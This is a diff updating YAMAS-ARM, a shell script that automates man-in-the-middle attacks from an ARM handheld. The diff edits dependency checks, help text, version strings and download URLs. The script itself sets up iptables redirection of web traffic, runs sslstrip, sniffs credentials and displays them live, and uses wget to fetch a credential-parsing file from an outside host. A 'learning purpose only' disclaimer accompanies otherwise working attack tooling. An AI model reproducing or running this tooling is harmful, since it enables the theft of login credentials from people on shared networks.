@@ -4,9 +4,10 @@
 # Based on yamas v0.9 by comaX for pcsci3ence.info
 
 #Version information
-version=0.9.2
+version=0.9.4
+
 # device variables
-pathLog=/home/user/.yamas
+pathLog=/home/user/yamas #MyDocs folder is unavailable when USB connected (mass strorage mode) and previous option would fail
 
 # if user ^C then execute cleanup function
 trap fast_cleanup SIGINT # will prolly output errors, but that's normal since it may try killing non-existing processes.
@@ -77,8 +78,8 @@ dep() {
    fi
           
    echo -en "\t sslstrip\t"
-   #if dpkg -l | grep sslstrip 1>/dev/null; then  # "sslstrip" package doesn't exist. One has to compile on target.
-   if [[ -e "/usr/bin/sslstrip" ]]; then          # therefore we do a simple check of existence
+   # "sslstrip" package doesn't exist. One has to compile on target.
+   if [ -e "/usr/bin/sslstrip" ]; then          # therefore we do a simple check of existence
      echo -e "\t\033[32m[Success]\033[m"
    else 
      echo -e "\t\033[31m[Failed!]\033[m"
@@ -109,23 +110,27 @@ dep() {
      echo 0 >> ./test.txt
    fi
    
-   if [[ ! -e "./test.txt" ]]; then
+   if [ ! -e "./test.txt" ]; then
       echo "All right ! Let's keep rolling..."
+      echo 1 > $pathLog/.ok
    else
       rm ./test.txt
-      echo "You are missing dependencies, this script will probably fail."
-      sleep 5
-      #exit ?
+      if [ -e "$pathLog/.ok" ]; then rm $pathLog/.ok; fi
+      echo "You are missing dependencies, this script will fail : exiting ! "
+      sleep 3
+
+      exit 0
    fi
 }
 
+if [ ! -e "$pathLog/.ok" ]; then dep; fi
 #Check if yamas folder exists, if not create it
 if [ ! -d "$pathLog" ]; then
    mkdir $pathLog
 fi
 
 if [ ! -f "/tmp/grepcred.txt" ]; then #in N900 the /tmp is purged at every reboot
-   wget -q http://comax.pagesperso-orange.fr/info/yamas/grepcred.txt -O /tmp/grepcred.txt #downloading temp file nedded for parsing.
+   wget -q http://comax.pagesperso-orange.fr/info/mitm/grepcred.txt -O /tmp/grepcred.txt #downloading temp file nedded for parsing.
 fi   #We do it now : we don't have to download twice in case --parse is used, and the script
 
 #Let's define some arguments that can be passed to the script :
@@ -133,17 +138,21 @@ args=
 while [ "$#" -ge 1 ] #check parameters
 do
   case $1 in
-   -d | --depend) #check for dependencies
+   -d | --depend) # force check for dependencies
       clear
       dep # calling the function.
-      exit 0 ;;
-   -v | --version) #check for dependencies
+
+
+      ;;
+      
+      -v | --version) #Print version and exits
       clear
       echo "YAMAS - Yet Another Man In The Middle Automation Script"
       echo "Version: $version"
       exit 0 ;;
-      
-	-p | --parse) #parse a given filename
+
+
+        -p | --parse) #parse a given filename
       if [[ "$2" == "" ]]; then 
          echo -e "No input file given. Quitting. \nusage : $0 -p <file>"
          exit 0
@@ -165,12 +174,16 @@ do
       clear 
       echo -e "You are running $0, YAMAS-ARM.
 
-usage : $0 [-h | --help] [-p | --parse <file>]
-   -h or --help    : Displays this help message, disclaimer and exit.
+
+usage : $0 <options>
+   -d or --depend : Force check of required dependencies.
+   -h or --help : Displays this help message, disclaimer and exit.
+   -p <file> or --parse <file> : Only parse the given <file>.
+             Don't use wildcards. Use > /output_file to print to a file.
    -v or --version : Show version and exit
-   -d or --depend  : Check if needed dependencies are satisfied and exit.
-   -p or --parse   : Only parse the given <file>. Don't use wildcards.
-             Use > /output_file to print to a file.
+
+
+
 
 \033[31m DISCLAIMER :\033[m
 This program is intended for learning purpose only. I do not condone hacking 
@@ -184,7 +197,7 @@ what this program does. The best way to understand what it does is
 to look at its source. This will also teach you basic shell scripting.
 
 \033[31mFeatures :\033[m
-- Compatbile with handled devices.
+- Compatible with handled devices.
 - Output of credentials as they are sniffed in xterm window.
 - Log parsing for user-friendly output.
 - Network mapping for host discovery.
@@ -199,7 +212,7 @@ Thanks to all people on backtrack forums for their help and support,
 as well as maemo's for this version. 
 Kudos to Unhuman for asking for this port and testing everything I asked him,
 Torpedo, both script-wise and for his great demo video,
-Saturn for making this script fully ash compliant,
+Saturn for making this script fully ash compliant and quite a load of stuff,
 All the other people for their feedback, support, and help !
 And google for being my best friend with scripting.
 
@@ -225,13 +238,16 @@ echo -e "\b
                      #    #     # #     # #     #  #####
                         ARM Edition For Pcsi3ence.info
 ===========================================================================
-=\033[31m       Welcome to Yet Another yamas Automation Script.\033[m                    =
+=\033[31m       Welcome to Yet Another MITM Automation Script.\033[m                    =
 =\033[31m       Use this tool responsibly, and enjoy!\033[m                             =
 =       Feel free to contribute and distribute this script as you please. =
 =       Official thread : http://tinyurl.com/yamas-arm                    =
 =       Check out the help (-h) to see edition informations               =
 =       You are running \033[32mYAMAS-arm\033[m                                  	  =
-==========================================================================="
+
+===========================================================================
+
+Make sure you checked your dependencies with -d option before running this script\n"
 
 # Starting fresh : reset IP forward and iptables
 echo -e "\033[31m [+] Cleaning iptables \033[m"
@@ -344,7 +360,7 @@ add_target() {
 ascii() {
    clear
    if [ ! -f "$pathLog/ascii" ]; then #if the ascii list doesn't exist get it from the web.
-      wget -q http://comax.pagesperso-orange.fr/info/yamas/ascii -O $pathLog/ascii
+      wget -q http://comax.pagesperso-orange.fr/info/mitm/ascii -O $pathLog/ascii
    fi
    cat $pathLog/ascii
    #rm /tmp/ascii
@@ -432,14 +448,14 @@ echo -e "\033[31m [+] Configuring iptables... \033[m"
 echo -en "\033[31m To \033[mwhat port should the traffic be redirected to? (default = 8080)"
 echo
 read outport
-if [ "$outport" = "" ] ; then
+if [[ "$outport" = "" ]] ; then
    outport=8080
    echo -e "Port $outport selected as default.\n"
 fi
 echo -en "\033[31m From \033[mwhat port should the traffic be redirected to? (default = 80)"
 echo
 read inport
-if [ "$inport" = "" ] ; then
+if [[ "$inport" = "" ]]; then
    inport=80
    echo -e "Port $inport selected as default.\n"
 fi
@@ -452,7 +468,7 @@ echo
 echo -e "\033[31m [+] Activating sslstrip... \033[m"
 echo  "Choose filename to output : (default = yamas)"
 read filename
-if [ "$filename" = "" ] ; then
+if [[ "$filename" = "" ]] ; then
    filename="yamas"
 fi
 echo -e "\033[33m Sslstrip will be listening on port $outport and outputting log in $pathLog/$filename.txt\033[m"
@@ -472,7 +488,7 @@ gateway=$(ip route show | awk '(NR == 2) { print $3}') #store gateway ip
 echo
 echo "Enter IP gateway adress or press enter to use $gateway."
 read gateway
-if [ "$gateway" = "" ] ; then
+if [[ "$gateway" = "" ]] ; then
    gateway=$(ip route show | awk '(NR == 2) { print $3}') #restore gateway ip since pressing enter set our var to null
    echo -e "$gateway selected as default.\n"
 fi
